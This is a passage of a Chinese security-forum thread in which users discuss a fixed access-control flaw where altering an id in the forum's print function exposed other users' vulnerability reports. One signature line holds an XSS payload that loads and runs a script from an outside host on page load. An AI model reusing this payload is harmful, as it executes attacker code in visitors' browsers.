导航

[【Bugs反馈】] 跪求吐司管理联系,发现论坛存在一处越权漏洞(已修复)

2019-12-17
#41
好奇是什么漏洞,想知道具体情况
2019-12-17
#42
过程呢,既然修复了?
2019-12-18
#43
我想我啥时候也能为论坛做点这样的贡献
2019-12-19
#44
打印越权,这骚操作可以
只有顽强,明日路总会更彷徨
2019-12-19
#45
回复 8# t00ls管理团队01
能描述一下问题是出在哪吗?
2019-12-19
#46
打印得时候可以修改id值来打印其他漏洞,然后能看到详情?我的疑问和鲁人甲大佬一样的,这种不应该是前端调用嘛?为嘛会扯上后端
我只是来打酱油的
2019-12-19
#47
回复 46# Dotaer
代码怎么写的具体情况得问管理大佬,我这边测试得结果是打印是调用了一个动作,可以直接展示漏洞详情。
2019-12-19
#48
回复 47# SuNu11
那意思就是我猜想的漏洞过程应该是对的咯
2019-12-20
#49
对,可以这样,我也不知道为啥会换成另一个action
有志者、事竟成,破釜沉舟
<Img Src=//x.is OnLoad=import(src)>
2019-12-20
#50
看来以后测试越权还可以测试下打印等功能